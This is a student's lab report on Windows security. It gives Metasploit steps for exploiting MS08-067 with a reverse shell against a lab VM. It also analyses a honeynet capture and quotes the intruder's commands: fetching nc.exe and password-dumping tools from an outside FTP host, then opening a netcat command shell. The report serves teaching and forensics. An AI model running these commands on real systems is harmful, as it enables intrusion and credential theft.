20211911 2021-2022-2 《網路攻防實踐》第六週實踐報告
1.實踐內容
Windows作業系統基本結構
(1)
| windows系統的核心基本模組 |
|---|
| Windows執行體 |
| Windows核心體 |
| 裝置驅動程式 |
| 硬體抽象層 |
| Windows視窗與圖形介面介面核心實現程式碼 |
(2)
| Windows核心的核心機制 |
|---|
| Windows程序和執行緒管理機制 |
| Windows記憶體管理機制 |
| Windows檔案管理機制 |
| Windows登錄檔管理機制 |
| Windows的網路機制 |
(3)
Windows執行機制
Windows系統核心中的程序和執行緒管理機制:
Windows程序中包括虛擬記憶體地址描述符、系統資源控制代碼列表、安全訪問令牌、記錄了程序Id及其父程序ID等資訊、並至少有一個執行緒執行執行緒。執行緒包括程式執行的上下文資訊,同時和程序共享虛擬地址、資源列表、安全令牌。
Windows作業系統的安全體系機制
(1)Windows身份認證機制
Windows為每個使用者和計算機設定賬戶進行管理,賬戶許可權的根本作用是限制這些賬戶的執行程式對系統物件的訪問(最高許可權的本地Administration賬戶)
(2)Windows授權與訪問控制機制
Windows的授權與訪問控制機制是基於引用監控器模型,由核心中的SRM模組與使用者態的LSASS服務共同來實施,由SRM作為安全主體訪問物件資源時的中介,根據設定的訪問控制列表進行授權訪問。
(3) Windows安全審計機制
Windows的審計策略由系統管理員定義。LSASS服務用於儲存審計策略,SRM安全引用控制器對物件訪問和操作事件進行記錄,EventLog服務將事件寫入日誌檔案中。
Windows遠端安全攻防技術
windows的遠端攻擊可以大致分為:遠端口令猜測與破解攻擊、攻擊網路服務、攻擊客戶端和使用者
2.實踐過程
動手實踐Metasploit windows attacker
任務:使用metasploit軟體進行windows遠端滲透統計實驗
具體任務內容:使用windows Attacker/BT4攻擊機嘗試對windows Metasploitable靶機上的MS08-067漏洞進行遠端滲透攻擊,獲取目標主機的訪問權
| 虛擬機器 | IP地址 |
|---|---|
| kali | 192.168.200.3 |
| Windows 2kserver | 192.168.200.8 |
| 1.在kali中輸入指令msfconsole |
|
| 2.輸入指令search ms08_067檢視漏洞ms08_067詳細資訊 | |
| 3.輸入指令use exploit/windows/smb/ms08_067_netapi使用該exploit | |
| 4.輸入指令show payloads顯示可攻擊載荷 | |
| 5.輸入指令set PAYlOAD generic/shell_reverse_tcp或者set PAYlOAD 3設定攻擊的載荷為tcp的反向連線 | |
| 6.輸入指令show options展示滲透攻擊需要設定的引數 | |
| 7.輸入指令show targets展示可滲透攻擊的靶機的作業系統及版本 | |
| 8.輸入指令set LHOST 192.168.200.3設定滲透攻擊的主機是kali,輸入set RHOST 192.168.200.8設定滲透攻擊的Win2KServer_靶機IP | |
| 9.輸入指令exploit開始滲透攻擊。溫馨提示:記得開啟蜜罐閘道器 | |
| 10.在靶機中輸入指令ipconfig/all顯示靶機的作業系統和IP配置 | |
| 同時在kali輸入指令ipconfig/all顯示靶機的作業系統和IP配置,滲透攻擊成功 | |
| 同樣在kali輸入指令net user檢視使用者,顯示kali主機和win 2kserver,滲透攻擊成功 | |
取證分析實踐:解碼一次成功的NT系統破解攻擊。
來自212.116.251.162的攻擊者成功攻陷了一臺由rfp部署的蜜罐主機172.16.1.106,(主機名為lab.wiretrip.net),要求提取並分析攻擊的全部過程。
攻擊者使用了什麼破解工具進行攻擊
攻擊者如何使用這個破解工具進入並控制了系統
攻擊者獲得系統訪問許可權後做了什麼
我們如何防止這樣的攻擊
你覺得攻擊者是否警覺了他的目標是一臺蜜罐主機?如果是,為什麼
(1).攻擊者使用了什麼破解工具進行攻擊
1.用wireshark開啟[email protected]
2.接下來設定限定條件為:ip.addr==172.16.1.106 and http。
3.然後就開始往下翻,編號為117的這一行發現有一些奇怪的路徑。這個boot.ini是NT系統的啟動檔案。
4.在該data前面的..%c0AF..查閱資料後得知,這是"/"的Unicode編碼,基本確定存在Unicode漏洞攻擊。
Unicode漏洞是指在Unicode字元解碼時,IIS 4.0/5.0存在一個安全漏洞,導致使用者可以遠端通過iis執行任意命令。
當用戶用IIS開啟檔案時,如果該檔名包含Unicode字元,系統會對其進行解碼。如果使用者提供一些特殊的編碼,將導致IIS錯誤地開啟或者執行某些Web根目錄以外的檔案。
5.在140行然後有一個msadcs.dll檔案,這是一個遠端資料訪問服務的檔案,存在RDS漏洞,該漏洞可以導致攻擊者遠端執行使用者系統的命令,並以裝置使用者的身份執行。
6.進行TCP流追蹤,看到!ADM!ROX!YOUR!WORLD!
追蹤資料流時發現!ADM!ROX!YOUR!WORLD!出現了很多次,查詢可知這個來自一個名為msadc2.pl的攻擊工具。根據教材內容,證實這是RDS漏洞攻擊
(2).攻擊者如何使用這個破解工具進入並控制了系統?
1.之後出現了ftp的連線,目標IP為204.42.253.18。通過追蹤TCP流發現,這個連線由於口令錯誤導致連線失敗。說明這次攻擊是一個失敗的攻擊。
2.追蹤TCP流,可以看出:攻擊者通過建立了ftpcom指令碼,使用ftp連線www.nether.net,並以johna2k為使用者haxedj00為密碼下載 nc.exe、pdump.exe和samdump.dll。
3.可以發現這次的攻擊不是RDS攻擊,而是Unicode漏洞攻擊。通過追蹤TCP流,發現攻擊者傳送了以下指令:
copy C:\winnt\system32\cmd.exe cmd1.exe
cmd1.exe /c open 213.116.251.162 >ftpcom
cmd1.exe /c echo johna2k >>ftpcom
cmd1.exe /c echo haxedj00 >>ftpcom
cmd1.exe /c echo get nc.exe >>ftpcom
cmd1.exe /c echo get pdump.exe >>ftpcom
cmd1.exe /c echo get samdump.dll >>ftpcom
cmd1.exe /c echo quit >>ftpcom
4.、在下載完檔案之後,檢視到 1224 號資料包,攻擊者執行了這樣一條命令:cmd1.exe /c nc -l -p 6969 -e cmd1.exe。表示攻擊者連線了6969埠,並且獲得了訪問許可權,進入了互動式控制階段:
(3).攻擊者獲得系統訪問許可權後做了什麼
1.我們用tcp.port == 6969篩選並追蹤tcp流,我們可以看到攻擊者修改各種檔案,企圖通過pdump、samdump、net命令、rdisk命令等方式提權為管理員,成功後還刪除了ftpcom檔案等痕跡。
2.在1361分組的資料流中,下圖攻擊者使用了SQl注入,在靶機系統目錄下生成一個檔案
3.在編號2339追蹤http流,我們可以看到ADD,這意味著提升許可權
4.攻擊者放棄了pdump提取Administrator口令密文的企圖。攻擊者刪除了samdump和pdump。
5.最後攻擊者exit
(4).我們如何防止這樣的攻擊
這場攻擊主要是是針對RDS漏洞的攻擊和針對Unicode漏洞的攻擊,防範方法有:
1.使用者及時從如下地址下載Microsoft提供的補丁:t.asp為IIS 4.0的補丁地址,.asp為IIS 5.0補丁地址
2.安裝windows NT系統時不要使用預設WINNT路徑,您可以改為其他的資料夾,如C:\mywindowsbule
3.使用 NTFS 檔案系統,因為 FAT 幾乎不提供安全功能
(5).你覺得攻擊者是否警覺了他的目標是一臺蜜罐主機?如果是,為什麼
繼續追蹤TCP流,就可以在分組4351處看到下圖,由此可以得知攻擊者已經警覺他的目標是一臺蜜罐主機
團隊對抗實踐:windows系統遠端滲透攻擊和分析。
攻方使用metasploit選擇漏洞進行攻擊,獲得控制權。(要求寫出攻擊方的同學資訊、使用漏洞、相關IP地址等)
防守方使用wireshark監聽獲得的網路資料包,分析攻擊過程,獲取相關資訊。